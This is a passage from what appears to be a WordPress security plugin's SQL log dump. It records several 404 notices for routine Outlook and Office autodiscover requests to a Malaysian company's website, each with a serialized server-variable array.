SessionID=DF862170-E239-460F-8356-D2CA3A0CF5FD\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"643-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0Bfj3@-6BuXzuYs053NAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"49428\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0Bfj3@-6BuXzuYs053NAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571619198.9753\";s:12:\"REQUEST_TIME\";s:10:\"1571619198\";}}','notice','2019-10-21 00:53:21','2019-10-21 00:53:19',35677192,37477456,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'124.13.207.181'),(28537,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:62:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"662-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{4AD788BD-1621-4DA4-BFF6-97482B526BBA}\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=334d526284c6749daf8e3b13d9029688\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.30.0.191013 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=DF862170-E239-460F-8356-D2CA3A0CF5FD\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"662-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0Bgj3@-6BuXzuYs053OAAAAAM\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"49428\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0Bgj3@-6BuXzuYs053OAAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571619203.0166\";s:12:\"REQUEST_TIME\";s:10:\"1571619203\";}}','notice','2019-10-21 00:53:24','2019-10-21 00:53:23',35283632,37080512,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'124.13.207.181'),(28538,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:62:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"5\";s:13:\"H2_STREAM_TAG\";s:5:\"659-5\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{5544BDA2-E977-4EA0-BC28-B9B2719CB589}\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=334d526284c6749daf8e3b13d9029688\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.30.0.191013 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=DF862170-E239-460F-8356-D2CA3A0CF5FD\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"5\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"659-5\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0BhT3@-6BuXzuYs053OwAAAAU\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"49428\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0BhT3@-6BuXzuYs053OwAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571619205.6348\";s:12:\"REQUEST_TIME\";s:10:\"1571619205\";}}','notice','2019-10-21 00:53:27','2019-10-21 00:53:26',35284272,37086376,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'124.13.207.181'),(28539,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:62:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"7\";s:13:\"H2_STREAM_TAG\";s:5:\"646-7\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{E7E401FF-BA1C-4C95-B490-42422789C3AF}\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=334d526284c6749daf8e3b13d9029688\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.30.0.191013 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=DF862170-E239-460F-8356-D2CA3A0CF5FD\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"7\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"646-7\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0BiD3@-6BuXzuYs053PgAAAAc\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"49428\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0BiD3@-6BuXzuYs053PgAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571619208.1351\";s:12:\"REQUEST_TIME\";s:10:\"1571619208\";}}','notice','2019-10-21 00:53:30','2019-10-21 00:53:28',35284272,37086376,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'124.13.207.181'),(28540,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4CB730D0-734B-4C95-8D61-DD916A6C7D3A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0CE@ChWqi2NVtnqltzGAAAAhI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"49818\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0CE@ChWqi2NVtnqltzGAAAAhI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571619347.5387\";s:12:\"REQUEST_TIME\";s:10:\"1571619347\";}}','notice','2019-10-21 00:55:49','2019-10-21 00:55:47',35725432,37531704,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28541,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"563C37A6-A4A3-4CC7-B11C-A1ED79F305CC\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0CNKjZzpoQqaKQA3IAvAAAAMs\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"49932\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0CNKjZzpoQqaKQA3IAvAAAAMs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571619380.1189\";s:12:\"REQUEST_TIME\";s:10:\"1571619380\";}}','notice','2019-10-21 00:56:22','2019-10-21 00:56:20',35275592,37072920,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28542,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4CB730D0-734B-4C95-8D61-DD916A6C7D3A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0C5qjZzpoQqaKQA3IA3AAAANY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"50003\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0C5qjZzpoQqaKQA3IA3AAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571619558.669\";s:12:\"REQUEST_TIME\";s:10:\"1571619558\";}}','notice','2019-10-21 00:59:20','2019-10-21 00:59:19',35273336,37079376,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28543,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; 